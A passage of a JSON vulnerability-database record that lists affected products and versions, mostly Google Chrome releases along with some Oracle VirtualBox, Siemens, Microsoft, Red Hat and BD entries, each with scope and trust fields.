      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.627.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.826.0"
      },
      {
        "model": "identity manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "2.7"
      },
      {
        "model": "chrome ~~~andr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "40.0.2214.89"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.581.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.544.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.130"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1041"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.336.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.11"
      },
      {
        "model": "simatic s7-1518-4 pn/dp odk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "52.0.2743.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "53.0.2785.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.124"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1295.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.922.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.113"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.638.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1049.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.219"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.910.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.149"
      },
      {
        "model": "vm virtualbox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1686.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "model": "simatic ipc427d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.671.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.366.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.68"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.424.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.898.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.478.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.107"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.100"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.465.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.540.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.57"
      },
      {
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.46"
      },
      {
        "model": "sql server for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1004.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.136"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.935.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.821.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.212.1"
      },
      {
        "model": "max",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.32"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.492.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.923.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.547.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.948.0"
      },
      {
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.74"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.114"
      },
      {
        "model": "pyxis duostation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1024.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.784.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.15"
      },
      {
        "model": "windows server for 32-bit systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.90"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.86"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1017.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.84"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.683.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.9.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.425.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.486.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.747.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.333"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.2"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1017090"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1077.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1300.0"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.32"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1028"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.133"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.61"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.773.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.26"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.64"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.157"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.739.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.4"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.19"
      },
      {
        "model": "influx",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.57"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.404.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491059"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.59"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.159.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.101"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1028.0"
      },
      {
        "model": "chrome os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "google",
        "version": "65.0.3325.167"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1013"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.658.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.159"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1023"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.761.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.690.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.44"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.16"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.24"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.660.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "57.0.2987.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1676.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.108"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.137"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1669.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.587.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.60"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.16"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.321.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "39.0.2171.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.48"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.7"
      },
      {
